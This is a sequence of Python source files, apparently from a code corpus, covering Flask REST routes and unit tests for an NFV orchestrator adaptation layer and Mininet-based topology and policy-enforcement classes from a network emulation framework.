@rano_bp.route('/<orc_id>/ns_instances', methods=['POST'])
def create_ns(orc_id):
try:
driver = manager.get_driver(request.blueprint, orc_id, database.msolo_db)
ns, headers = driver.create_ns(
args={'payload': request.json, 'args': request.args.to_dict()})
return make_response(jsonify(ns), 201, headers)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except Forbidden as e:
abort(403, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound, NsdNotFound) as e:
abort(404, description=e.description)
except Conflict as e:
abort(409, description=e.description)
except Unprocessable as e:
abort(422, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/ns_instances', methods=['GET'])
@rano_bp.route('/<orc_id>/ns_instances', methods=['GET'])
def get_ns_list(orc_id):
try:
driver = manager.get_driver(request.blueprint, orc_id, database.msolo_db)
ns_list, headers = driver.get_ns_list(args={'args': request.args.to_dict()})
return make_response(jsonify(ns_list), 200, headers)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound) as e:
abort(404, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/ns_instances/<ns_id>', methods=['GET'])
@rano_bp.route('/<orc_id>/ns_instances/<ns_id>', methods=['GET'])
def get_ns(orc_id, ns_id):
try:
driver = manager.get_driver(request.blueprint, orc_id, database.msolo_db)
ns, headers = driver.get_ns(ns_id, args={'args': request.args.to_dict()})
return make_response(jsonify(ns), 200, headers)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound, NsNotFound) as e:
abort(404, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/ns_instances/<ns_id>', methods=['DELETE'])
@rano_bp.route('/<orc_id>/ns_instances/<ns_id>', methods=['DELETE'])
def delete_ns(orc_id, ns_id):
try:
driver = manager.get_driver(request.blueprint, orc_id, database.msolo_db)
empty_body, headers = driver.delete_ns(
ns_id, args={'args': request.args.to_dict()})
return make_response('', 204, headers)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except Forbidden as e:
abort(403, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound, NsNotFound) as e:
abort(404, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/ns_instances/<ns_id>/instantiate', methods=['POST'])
@rano_bp.route('/<orc_id>/ns_instances/<ns_id>/instantiate', methods=['POST'])
def instantiate_ns(orc_id, ns_id):
try:
driver = manager.get_driver(request.blueprint, orc_id, database.msolo_db)
empty_body, headers = driver.instantiate_ns(
ns_id,
args={'payload': request.json, 'args': request.args.to_dict()})
return make_response('', 202, headers)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except Forbidden as e:
abort(403, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound, NsNotFound) as e:
abort(404, description=e.description)
except Conflict as e:
abort(409, description=e.description)
except Unprocessable as e:
abort(422, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/ns_instances/<ns_id>/terminate', methods=['POST'])
@rano_bp.route('/<orc_id>/ns_instances/<ns_id>/terminate', methods=['POST'])
def terminate_ns(orc_id, ns_id):
try:
driver = manager.get_driver(request.blueprint, orc_id, database.msolo_db)
empty_body, headers = driver.terminate_ns(
ns_id,
args={'args': request.args.to_dict()})
return make_response('', 202, headers)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except Forbidden as e:
abort(403, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound, NsNotFound) as e:
abort(404, description=e.description)
except Conflict as e:
abort(409, description=e.description)
except Unprocessable as e:
abort(422, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/ns_instances/<ns_id>/scale', methods=['POST'])
@rano_bp.route('/<orc_id>/ns_instances/<ns_id>/scale', methods=['POST'])
def scale_ns(orc_id, ns_id):
try:
driver = manager.get_driver(request.blueprint, orc_id, database.msolo_db)
empty_body, headers = driver.scale_ns(
ns_id,
args={'payload': request.json, 'args': request.args.to_dict()})
return make_response('', 202, headers)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except Forbidden as e:
abort(403, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound, NsNotFound) as e:
abort(404, description=e.description)
except Conflict as e:
abort(409, description=e.description)
except Unprocessable as e:
abort(422, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/ns_lcm_op_occs', methods=['GET'])
@rano_bp.route('/<orc_id>/ns_lcm_op_occs', methods=['GET'])
def get_op_list(orc_id):
try:
driver = manager.get_driver(request.blueprint, orc_id, database.msolo_db)
op_list, headers = driver.get_op_list(args={'args': request.args.to_dict()})
return make_response(jsonify(op_list), 200, headers)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound, NsNotFound) as e:
abort(404, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/ns_lcm_op_occs/<nsLcmOpId>', methods=['GET'])
@rano_bp.route('/<orc_id>/ns_lcm_op_occs/<nsLcmOpId>', methods=['GET'])
def get_op(orc_id, nsLcmOpId):
try:
driver = manager.get_driver(request.blueprint, orc_id, database.msolo_db)
ns_op, headers = driver.get_op(nsLcmOpId, args={'args': request.args.to_dict()})
return make_response(jsonify(ns_op), 200, headers)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound,
NsNotFound, NsOpNotFound) as e:
abort(404, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/subscriptions', methods=['GET'])
def get_subscription_list(orc_id):
try:
return make_response(jsonify(database.msolo_db.get_subscription_list(orc_id)), 200)
except Unauthorized as e:
abort(401, description=e.description)
except NfvoNotFound as e:
abort(404, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/subscriptions', methods=['POST'])
def create_subscription(orc_id):
try:
return make_response(jsonify(database.msolo_db.create_subscription(orc_id, request.json)), 201)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except Forbidden as e:
abort(403, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound) as e:
abort(404, description=e.description)
except Conflict as e:
abort(409, description=e.description)
except Unprocessable as e:
abort(422, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/subscriptions/<subscriptionId>', methods=['GET'])
def get_subscription(orc_id, subscriptionId):
try:
return make_response(jsonify(database.msolo_db.get_subscription(orc_id, subscriptionId)), 200)
except Unauthorized as e:
abort(401, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound, SubscriptionNotFound) as e:
abort(404, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/subscriptions/<subscriptionId>', methods=['DELETE'])
def delete_subscription(orc_id, subscriptionId):
try:
database.msolo_db.delete_subscription(subscriptionId)
return make_response('', 204)
except Unauthorized as e:
abort(401, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound, SubscriptionNotFound) as e:
abort(404, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/notifications', methods=['POST'])
def post_notification(orc_id):
required = ('nsInstanceId', 'operation', 'operationState')
if not all(k in request.json for k in required):
abort(400, 'One of {0} is missing'.format(str(required)))
tasks.forward_notification.delay(request.json)
return make_response('', 204)
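# Illustrative notification payload (assumed example values): the three fields
# required above, e.g.
# {"nsInstanceId": "49ccb6a2-5bcd-4f35-a2cf-7728c54e48b7",
#  "operation": "INSTANTIATE", "operationState": "COMPLETED"}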
```
#### File: mso-lo/adaptation_layer/db.py
```python
import os
from flask_migrate import Migrate
from adaptation_layer.repository import sqlite, iwf_repository
from flask import current_app, _app_ctx_stack
class MsoloDB(object):
def __init__(self, app=None):
if app is not None:
self.init_app(app)
def init_app(self, app):
self.app = app
app.teardown_appcontext(self.teardown)
IWFREPO = os.getenv('IWFREPO', 'false').lower()
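# Illustrative: setting IWFREPO=true in the environment selects the IWF
# repository backend; any other value (or unset) falls back to local SQLite.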
if IWFREPO == 'true':
self.app.logger.info('using iwf repository')
self.msolo_db = iwf_repository
else:
self.app.logger.info('using sqlite')
sqlite.db.init_app(self.app)
basedir = os.path.abspath(os.path.dirname(__file__))
MIGRATION_DIR = os.path.join(basedir, 'migrations')
migrate = Migrate(self.app, sqlite.db, directory=MIGRATION_DIR)
self.msolo_db = sqlite
def teardown(self, exception):
ctx = _app_ctx_stack.top
if hasattr(ctx, 'msolo_db'):
del ctx.msolo_db
```
#### File: adaptation_layer/tests/test_fivegr_so.py
```python
import unittest
from urllib.parse import urlparse
from jsonschema import validate
from jsonschema.exceptions import ValidationError, SchemaError
from adaptation_layer import create_app
from .request_mock import mock_ns, mock_ns_scale_v2, mock_ns_terminate, mock_ns_instantiatev2, mock_ns_instantiate
from .response_schemas import ns_lcm_op_occ_schema, ns_list_schema, ns_schema, \
ns_lcm_op_occ_list_schema
class fivegrSOTestCase(unittest.TestCase):
client = None
@classmethod
def setUpClass(cls):
"""Define test variables and initialize app."""
cls.client = create_app().test_client
# Check status codes 201, 401, 404, headers and payload for create_ns()
def test_create_ns_201(self):
res = self.client().post('/nfvo/4/ns_instances?__code=201', json=mock_ns)
self.assertEqual(201, res.status_code)
self.assertIn('Location', res.headers)
validate_url = urlparse(res.headers["Location"])
self.assertTrue(all([validate_url.scheme, validate_url.netloc, validate_url.path]))
try:
validate(res.json, ns_schema)
except (ValidationError, SchemaError) as e:
self.fail(msg=e.message)
def test_create_ns_400(self):
res = self.client().post('/nfvo/4/ns_instances?__code=400')
self.assertEqual(400, res.status_code)
# Check status codes 200, 401, 404, headers and payload for get_ns()
def test_get_ns_200(self):
res = self.client().get('/nfvo/4/ns_instances/49ccb6a2-5bcd-4f35-a2cf-7728c54e48b7?__code=200')
self.assertEqual(200, res.status_code)
try:
validate(res.json, ns_schema)
except (ValidationError, SchemaError) as e:
self.fail(msg=e.message)
# FIXME: Improve 5gr-so OPENAPI specification to make non functional requirements work
# def test_get_ns_404(self):
# res = self.client().get('/nfvo/4/ns_instances/49ccb6a2-5bcd-4f35-a2cf-7728c54e48b8?__code=404')
# self.assertEqual(404, res.status_code)
# Check status codes 202, 401, 404, headers and payload for instantiate_ns()
def test_instantiate_ns_202(self):
res = self.client().post('/nfvo/4/ns_instances/49ccb6a2-5bcd-4f35-a2cf-7728c54e48b7/instantiate?__code=200', json=mock_ns_instantiatev2)
self.assertEqual(202, res.status_code)
self.assertIn('Location', res.headers)
validate_url = urlparse(res.headers["Location"])
self.assertTrue(all([validate_url.scheme, validate_url.netloc, validate_url.path]))
def test_instantiate_ns_400(self):
res = self.client().post('/nfvo/4/ns_instances/49ccb6a2-5bcd-4f35-a2cf-7728c54e48b7/instantiate?__code=400', json=mock_ns_instantiate)
self.assertEqual(400, res.status_code)
def test_instantiate_ns_404(self):
res = self.client().post('/nfvo/4/ns_instances/49ccb6a2-5bcd-4f35-a2cf-7728c54e48b9/instantiate?__code=404', json=mock_ns_instantiatev2)
self.assertEqual(404, res.status_code)
# Check status codes 202, 401, 404, headers and payload for scale_ns()
def test_scale_ns_202(self):
res = self.client().post('/nfvo/4/ns_instances/49ccb6a2-5bcd-4f35-a2cf-7728c54e48b7/scale?__code=200',
json=mock_ns_scale_v2)
self.assertEqual(202, res.status_code)
self.assertIn('Location', res.headers)
validate_url = urlparse(res.headers["Location"])
self.assertTrue(all([validate_url.scheme, validate_url.netloc, validate_url.path]))
def test_scale_ns_404(self):
res = self.client().post('/nfvo/4/ns_instances/49ccb6a2-5bcd-4f35-a2cf-7728c54e48b7/scale?__code=404',
json=mock_ns_scale_v2)
self.assertEqual(404, res.status_code)
# Check status codes 202, 401, 404, headers and payload for terminate_ns()
def test_terminate_ns_202(self):
res = self.client().post('/nfvo/4/ns_instances/49ccb6a2-5bcd-4f35-a2cf-7728c54e48b7/terminate?__code=200',
json=mock_ns_terminate)
self.assertEqual(202, res.status_code)
self.assertIn('Location', res.headers)
validate_url = urlparse(res.headers["Location"])
self.assertTrue(all([validate_url.scheme, validate_url.netloc, validate_url.path]))
def test_terminate_ns_404(self):
res = self.client().post('/nfvo/4/ns_instances/49ccb6a2-5bcd-4f35-a2cf-7728c54e48b7/terminate?__code=404',
json=mock_ns_terminate)
self.assertEqual(404, res.status_code)
# Check status codes 200, 401, 404, headers and payload for get_ns_lcm_op_occs_()
def test_get_ns_lcm_op_occs_200(self):
res = self.client().get('/nfvo/4/ns_lcm_op_occs/49ccb6a2-5bcd-4f35-a2cf-7728c54c48b7?__code=200')
self.assertEqual(200, res.status_code)
try:
validate(res.json, ns_lcm_op_occ_schema)
except (ValidationError, SchemaError) as e:
self.fail(msg=e.message)
self.assertEqual(200, res.status_code)
def test_get_ns_lcm_op_occs_404(self):
res = self.client().get('/nfvo/4/ns_lcm_op_occs/49ccb6a2-5bcd-4f35-a2cf-7728c54c48b7?__code=404')
self.assertEqual(404, res.status_code)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "5GExchange/escape",
"score": 2
} |
#### File: escape/adapt/policy_enforcement.py
```python
import repr
from functools import wraps
from escape.adapt import log as log
class PolicyEnforcementError(RuntimeError):
"""
Exception class to signal policy enforcement error.
"""
pass
class PolicyEnforcementMetaClass(type):
"""
Meta class for handling policy enforcement in the context of classes inherited
from :class:`AbstractVirtualizer
<escape.orchest.virtualization_mgmt.AbstractVirtualizer>`.
If the :class:`PolicyEnforcement` class contains a function whose name
matches one in the actual Virtualizer, then PolicyEnforcement's function will
be called first.
.. warning::
Therefore the function names must be identical!
.. note::
If policy checking fails, a :class:`PolicyEnforcementError` should be
raised and handled in a higher layer.
To use policy checking set the following class attribute:
>>> __metaclass__ = PolicyEnforcementMetaClass
"""
def __new__ (mcs, name, bases, attrs):
"""
Magic function called before the subordinated class is even created.
:param name: given class name
:type name: str
:param bases: bases of the class
:type bases: tuple
:param attrs: given attributes
:type attrs: dict
:return: inferred class instance
:rtype: AbstractVirtualizer
"""
# Check Virtualizer methods
for attr_name, attr_value in attrs.iteritems():
# if non-private and callable
if not attr_name.startswith('_') and callable(attr_value):
# Get policy checking functions from PolicyEnforcement
hooks = (getattr(PolicyEnforcement, "pre_" + attr_name, None),
getattr(PolicyEnforcement, "post_" + attr_name, None))
# if pre and/or post hook is defined set a wrapper
if any(hooks):
attrs[attr_name] = mcs.get_wrapper(attr_value, hooks)
return super(PolicyEnforcementMetaClass, mcs).__new__(mcs, name, bases,
attrs)
@classmethod
def get_wrapper (mcs, orig_func, hooks):
"""
Return a decorator function which does the policy enforcement check.
:param orig_func: original function
:type orig_func: func
:param hooks: tuple of pre and post checking functions
:type hooks: tuple
:raise: PolicyEnforcementError
:return: decorator function
:rtype: func
"""
@wraps(orig_func)
def wrapper (*args, **kwargs):
"""
Wrapper function which calls the policy checking functions if they exist.
"""
if len(args) > 0:
# Call Policy checking function before original
if hooks[0]:
log.debug("Invoke Policy checking function: [PRE] %s" % (
hooks[0].__name__.split('pre_', 1)[1]))
hooks[0](args, kwargs)
# Call original function
ret_value = orig_func(*args, **kwargs)
# Call Policy checking function after original
if hooks[1]:
log.debug("Invoke Policy checking function: [POST] %s" % (
hooks[1].__name__.split('post_', 1)[1]))
hooks[1](args, kwargs, ret_value)
return ret_value
else:
log.warning("Something went wrong during binding Policy checker!")
log.error("Abort policy enforcement checking!")
raise PolicyEnforcementError("Policy enforcement checking is aborted")
return wrapper
class PolicyEnforcement(object):
"""
Proxy class for policy checking.
Contains the policy checking functions.
Binding is based on the function name (the checking function has to exist in
this class and its name has to consist of the `pre_` or `post_` prefix followed
by the name of the checked function).
.. warning::
Every PRE policy checking function is a classmethod and needs to have two
parameters for the nameless (args) and named (kwargs) params:
Example:
>>> def pre_sanity_check (cls, args, kwargs):
.. warning::
Every POST policy checking function is a classmethod and needs to have three
parameters for the nameless (args), named (kwargs) params and the return value:
Example:
>>> def post_sanity_check (cls, args, kwargs, ret_value):
.. note::
The first element of args is the supervised Virtualizer ('self' param in the
original function)
"""
def __init__ (self):
"""
Init
"""
super(PolicyEnforcement, self).__init__()
@classmethod
def pre_sanity_check (cls, args, kwargs):
"""
Implements the sanity check before the virtualizer's sanity check is called.
:param args: original nameless arguments
:type args: tuple
:param kwargs: original named arguments
:type kwargs: dict
:return: None
"""
virtualizer = args[0]
nffg = args[1]
# TODO - implement
log.debug("PolicyEnforcement: sanity_check NFFG(%s) <--> %s [OK]" % (
nffg, repr.repr(virtualizer)))
@classmethod
def post_sanity_check (cls, args, kwargs, ret_value):
"""
Implements the sanity check after the virtualizer's sanity check is called.
:param args: original nameless arguments
:type args: tuple
:param kwargs: original named arguments
:type kwargs: dict
:param ret_value: return value of Virtualizer's policy check function
:return: None
"""
virtualizer = args[0]
nffg = args[1]
# TODO - implement
log.debug("PolicyEnforcement: sanity_check NFFG(%s) <--> %s [OK]" % (
nffg, repr.repr(virtualizer)))
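# Minimal usage sketch (illustrative; class and variable names are hypothetical):
#
#   class MyVirtualizer(AbstractVirtualizer):
#     __metaclass__ = PolicyEnforcementMetaClass
#
#     def sanity_check (self, nffg):
#       ...
#
# Calling MyVirtualizer().sanity_check(nffg) then runs
# PolicyEnforcement.pre_sanity_check, the original method and
# PolicyEnforcement.post_sanity_check, in that order.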
```
#### File: escape/infr/topology.py
```python
from escape.infr import log, LAYER_NAME
from escape.nffg_lib.nffg import NFFG
from escape.nffg_lib.nffg_elements import NodeInfra
from escape.util.config import CONFIG
from escape.util.misc import quit_with_error, get_ifaces, remove_junks_at_boot
from mininet.link import TCLink, Intf
from mininet.net import VERSION as MNVERSION, Mininet, MininetWithControlNet
from mininet.node import RemoteController, RemoteSwitch
from mininet.term import makeTerms
from mininet.topo import Topo
class AbstractTopology(Topo):
"""
Abstract class for representing emulated topology.
Has the functions to build an ESCAPE-specific topology.
Can be used to define a reusable topology similar to Mininet's high-level API.
A reusable, convenient and pre-defined way to define a topology, but less
flexible and powerful.
"""
# Default host options
default_host_opts = None
"""Default host options for Mininet"""
# Default switch options
default_switch_opts = None
"""Default switch options for Mininet"""
# Default link options
default_link_opts = None
"""Default link options for Mininet"""
# Default EE options
default_EE_opts = None
"""Default EE options for Mininet"""
# Type of the Topology class - NEED to be set
# The construction and build of the network is different for the STATIC and
# DYNAMIC way
TYPE = None
"""Type of the Topology class - NEED to be set"""
def __init__ (self, hopts=None, sopts=None, lopts=None, eopts=None):
"""
Init.
:param hopts: host options (optional)
:param sopts: switch options (optional)
:param lopts: link options (optional)
:param eopts: EE options (optional)
:return: None
"""
# Topo is Old-style class
Topo.__init__(self, hopts, sopts, lopts, eopts)
def construct (self, builder=None):
"""
Base class for construct the topology.
:param builder: optional builder object
"""
raise NotImplementedError
@staticmethod
def get_topo_desc ():
"""
Return the NFFG object represents the specific, constructed topology
:return: topology description
:rtype: :any`NFFG`
"""
raise NotImplementedError
class FallbackStaticTopology(AbstractTopology):
"""
Topology class for testing purposes and serve as a fallback topology.
Use the static way for topology compilation.
.. raw:: ascii
+----------+ +----------+
| | | |
| SW1 | | SW2 |
| | | |
+----------+ +----------+
|1 |1
1| 1|
+----------+ +----------+
| |2 2| |
| SW3 +-----------+ SW4 |
| | | |
+----------+ +----------+
|3 |3
1| 1|
+----+ +----+
|SAP1| |SAP2|
+----+ +----+
"""
TYPE = "STATIC"
def construct (self, builder=None):
"""
Assemble the topology description statically.
:param builder: optional builder object
:return: self
:rtype: :any:`FallbackStaticTopology`
"""
# nc1 = self.addEE(name='NC1', {})
# nc2 = self.addEE(name='NC2', {})
log.info("Start static topology creation...")
log.debug("Create Switch with name: SW1")
sw1 = self.addSwitch('SW1')
log.debug("Create Switch with name: SW2")
sw2 = self.addSwitch('SW2')
log.debug("Create Switch with name: SW3")
sw3 = self.addSwitch('SW3')
log.debug("Create Switch with name: SW4")
sw4 = self.addSwitch('SW4')
log.debug("Create SAP with name: SAP1")
sap1 = self.addHost('SAP1')
log.debug("Create SAP with name: SAP2")
sap2 = self.addHost('SAP2')
log.debug("Create Link SW3 <--> SW1")
self.addLink(sw3, sw1)
log.debug("Create Link SW4 <--> SW2")
self.addLink(sw4, sw2)
log.debug("Create Link SW3 <--> SW4")
self.addLink(sw3, sw4)
log.debug("Create Link SAP1 <--> SW3")
self.addLink(sap1, sw3)
log.debug("Create Link SAP2 <--> SW4")
self.addLink(sap2, sw4)
log.info("Static topology creation has been finished!")
return self
@staticmethod
def get_topo_desc ():
"""
Return the topology description.
:return: topo description
:rtype: :class:`NFFG`
"""
# Create NFFG
nffg = NFFG(id="STATIC-FALLBACK-TOPO", name="fallback-static")
# Add switches
sw1 = nffg.add_infra(id="sw1", name="SW1", domain="INTERNAL",
infra_type=NFFG.TYPE_INFRA_SDN_SW)
sw2 = nffg.add_infra(id="sw2", name="SW2", domain="INTERNAL",
infra_type=NFFG.TYPE_INFRA_SDN_SW)
sw3 = nffg.add_infra(id="sw3", name="SW3", domain="INTERNAL",
infra_type=NFFG.TYPE_INFRA_SDN_SW)
sw4 = nffg.add_infra(id="sw4", name="SW4", domain="INTERNAL",
infra_type=NFFG.TYPE_INFRA_SDN_SW)
# Add SAPs
sap1 = nffg.add_sap(id="sap1", name="SAP1")
sap2 = nffg.add_sap(id="sap2", name="SAP2")
# Add links
nffg.add_link(sw1.add_port(1), sw3.add_port(1), id="l1")
nffg.add_link(sw2.add_port(1), sw4.add_port(1), id="l2")
nffg.add_link(sw3.add_port(2), sw4.add_port(2), id="l3")
nffg.add_link(sw3.add_port(3), sap1.add_port(1), id="l4")
nffg.add_link(sw4.add_port(3), sap2.add_port(1), id="l5")
# Duplicate one-way static links to become undirected in order to fit to
# the orchestration algorithm
# nffg.duplicate_static_links()
return nffg
class FallbackDynamicTopology(AbstractTopology):
"""
Topology class for testing purposes and serve as a fallback topology.
Use the dynamic way for topology compilation.
.. raw:: ascii
+----------+ +----------+
| | | |
| EE1 | | EE2 |
| | | |
+----------+ +----------+
|1 |1
1| 1|
+----------+ +----------+
| |2 2| |
| S3 +-----------+ S4 |
| | | |
+----------+ +----------+
|3 |3
1| 1|
+----+ +----+
|SAP1| |SAP2|
+----+ +----+
"""
TYPE = "DYNAMIC"
def construct (self, builder=None):
"""
Set a topology with NETCONF capability for mostly testing.
:param builder: builder object
:return: None
"""
log.info("Start dynamic topology creation...")
builder.create_Controller("ESCAPE")
agt1, nc_sw1 = builder.create_NETCONF_EE(name='NC1')
agt2, nc_sw2 = builder.create_NETCONF_EE(name='NC2')
sw3 = builder.create_Switch(name='SW3')
sw4 = builder.create_Switch(name='SW4')
sap1 = builder.create_SAP(name='SAP1')
sap2 = builder.create_SAP(name='SAP2')
builder.create_Link(sw3, nc_sw1)
builder.create_Link(sw4, nc_sw2)
builder.create_Link(sw3, sw4)
builder.create_Link(sap1, sw3)
builder.create_Link(sap2, sw4)
log.info("Dynamic topology creation has been finished!")
@staticmethod
def get_topo_desc ():
"""
Return the topology description.
:return: topo description
:rtype: :class:`NFFG`
"""
# Create NFFG
nffg = NFFG(id="DYNAMIC-FALLBACK-TOPO", name="fallback-dynamic")
# Add NETCONF capable containers a.k.a. Execution Environments
nc1 = nffg.add_infra(id="nc1", name="NC1", domain="INTERNAL",
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
nc2 = nffg.add_infra(id="nc2", name="NC2", domain="INTERNAL",
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
nc1.add_supported_type(['A', 'B'])
nc2.add_supported_type(['A', 'C'])
# Add inter-EE switches
sw3 = nffg.add_infra(id="sw3", name="SW3", domain="INTERNAL",
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
sw4 = nffg.add_infra(id="sw4", name="SW4", domain="INTERNAL",
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
# Add SAPs
sap1 = nffg.add_sap(id="sap1", name="SAP1")
sap2 = nffg.add_sap(id="sap2", name="SAP2")
# Add links
linkres = {'delay': 1.5, 'bandwidth': 2000}
nffg.add_link(nc1.add_port(1), sw3.add_port(1), id="l1", **linkres)
nffg.add_link(nc2.add_port(1), sw4.add_port(1), id="l2", **linkres)
nffg.add_link(sw3.add_port(2), sw4.add_port(2), id="l3", **linkres)
nffg.add_link(sw3.add_port(3), sap1.add_port(1), id="l4", **linkres)
nffg.add_link(sw4.add_port(3), sap2.add_port(1), id="l5", **linkres)
# Duplicate one-way static links to become undirected in order to fit to
# the orchestration algorithm
# No need for that, ESCAPENetworkBridge do this later
# nffg.duplicate_static_links()
return nffg
class InternalControllerProxy(RemoteController):
"""
Controller class for emulated Mininet network. Making connection with
internal controller initiated by InternalPOXAdapter.
"""
def __init__ (self, name="InternalPOXController", ip='127.0.0.1', port=6653,
**kwargs):
"""
Init.
:param name: name of the controller (default: InternalPOXController)
:type name: str
:param ip: IP address (default: 127.0.0.1)
:type ip: str
:param port: port number (default: 6653)
:type port: int
:return: None
"""
# Using old-style class because of MN's RemoteController class
RemoteController.__init__(self, name, ip, port, **kwargs)
def checkListening (self):
"""
Check the controller port is open.
"""
listening = self.cmd("echo A | telnet -e A %s %d" % (self.ip, self.port))
if 'Connected' not in listening:
log.debug(
"Unable to contact with internal controller at %s:%d. Waiting..." % (
self.ip, self.port))
class ESCAPENetworkBridge(object):
"""
Internal class for representing the emulated topology.
Represents a container class for network elements such as switches, nodes,
execution environments, links etc. Contains network management functions
similar to Mininet's mid-level API, extended with ESCAPEv2-related capabilities.
Separates the interface used internally from the original Mininet object to
implement loose coupling and avoid changes caused by Mininet API changes,
e.g. 2.1.0 -> 2.2.0.
Follows Bridge design pattern.
"""
def __init__ (self, network=None, topo_desc=None):
"""
Initialize Mininet implementation with proper attributes.
Use network as the hided Mininet topology if it's given.
:param topo_desc: static topology description e.g. the related NFFG
:type topo_desc: :class:`NFFG`
:param network: use this specific Mininet object for init (default: None)
:type network: :class:`mininet.net.MininetWithControlNet`
:return: None
"""
log.debug("Init ESCAPENetworkBridge with topo description: %s" % topo_desc)
if network is not None:
self.__mininet = network
else:
log.warning(
"Network implementation object is missing! Use Builder class instead "
"of direct initialization. Creating bare Mininet object anyway...")
self.__mininet = MininetWithControlNet()
# Topology description which is emulated by the Mininet
self.topo_desc = topo_desc
# Duplicate static links for ensure undirected neighbour relationship
if self.topo_desc is not None:
back_links = [l.id for u, v, l in
self.topo_desc.network.edges_iter(data=True) if
l.backward is True]
if len(back_links) == 0:
log.debug("No backward link has been detected! Duplicate STATIC links "
"to ensure undirected relationship for mapping...")
self.topo_desc.duplicate_static_links()
# Need to clean after shutdown
self._need_clean = None
# There is no such flag in the Mininet class so using this
self.started = False
self.xterms = []
@property
def network (self):
"""
Return the internal network representation.
:return: network representation
:rtype: :class:`mininet.net.MininetWithControlNet`
"""
return self.__mininet
def runXTerms (self):
"""
Start an xterm for every SAP if it's enabled in the global config. SAPs are
stored as hosts in the Mininet class.
:return: None
"""
if CONFIG.get_SAP_xterms():
log.debug("Starting xterm on SAPS...")
terms = makeTerms(nodes=self.__mininet.hosts, title='SAP', term="xterm")
self.xterms.extend(terms)
else:
log.warning("Skip starting xterms on SAPS according to global config")
def start_network (self):
"""
Start network.
:return: None
"""
log.debug("Starting Mininet network...")
if self.__mininet is not None:
if not self.started:
try:
self.__mininet.start()
except SystemExit:
quit_with_error(msg="Mininet emulation requires root privileges!",
logger=LAYER_NAME)
except KeyboardInterrupt:
quit_with_error(
msg="Initiation of Mininet network was interrupted by user!",
logger=log)
self.started = True
log.debug("Mininet network has been started!")
self.runXTerms()
else:
log.warning(
"Mininet network has already started! Skipping start task...")
else:
log.error("Missing topology! Skipping emulation...")
def stop_network (self):
"""
Stop network.
:return: None
"""
log.debug("Shutting down Mininet network...")
if self.__mininet is not None:
if self.started:
self.__mininet.stop()
self.started = False
log.debug("Mininet network has been stopped!")
else:
log.warning("Mininet network is not started yet! Skipping stop task...")
if self._need_clean:
self.cleanup()
def cleanup (self):
"""
Clean up junk which might be left over from old runs.
..seealso::
:func:`mininet.clean.cleanup() <mininet.clean.cleanup>`
"""
if self.started:
log.warning(
"Mininet network is not stopped yet! Skipping cleanup task...")
else:
log.info("Schedule cleanup task after Mininet emulation...")
# Kill remained xterms
log.debug("Close SAP xterms...")
import os
import signal
for term in self.xterms:
os.killpg(term.pid, signal.SIGTERM)
# Schedule a cleanup as a coop task to avoid threading issues
from escape.util.misc import remove_junks_at_shutdown
# call_as_coop_task(remove_junks, log=log)
# threading.Thread(target=remove_junks, name="cleanup", args=(log,
# )).start()
# multiprocessing.Process(target=remove_junks, name="cleanup",
# args=(log,)).start()
remove_junks_at_shutdown(log=log)
def get_agent_to_switch (self, switch_name):
"""
Return the agent to which the given switch is tied.
:param switch_name: name of the switch
:type switch_name: str
:return: the agent
:rtype: :class:`mininet.node.NetconfAgent`
"""
for switch in self.__mininet.switches:
if switch.name == switch_name:
return switch.agent
return None
class TopologyBuilderException(Exception):
"""
Exception class for topology errors.
"""
pass
class ESCAPENetworkBuilder(object):
"""
Builder class for topology.
Update the network object based on the parameters if it's given or create
an empty instance.
Always return with an ESCAPENetworkBridge instance which offer a generic
interface for created :class:`mininet.net.Mininet` object and hide
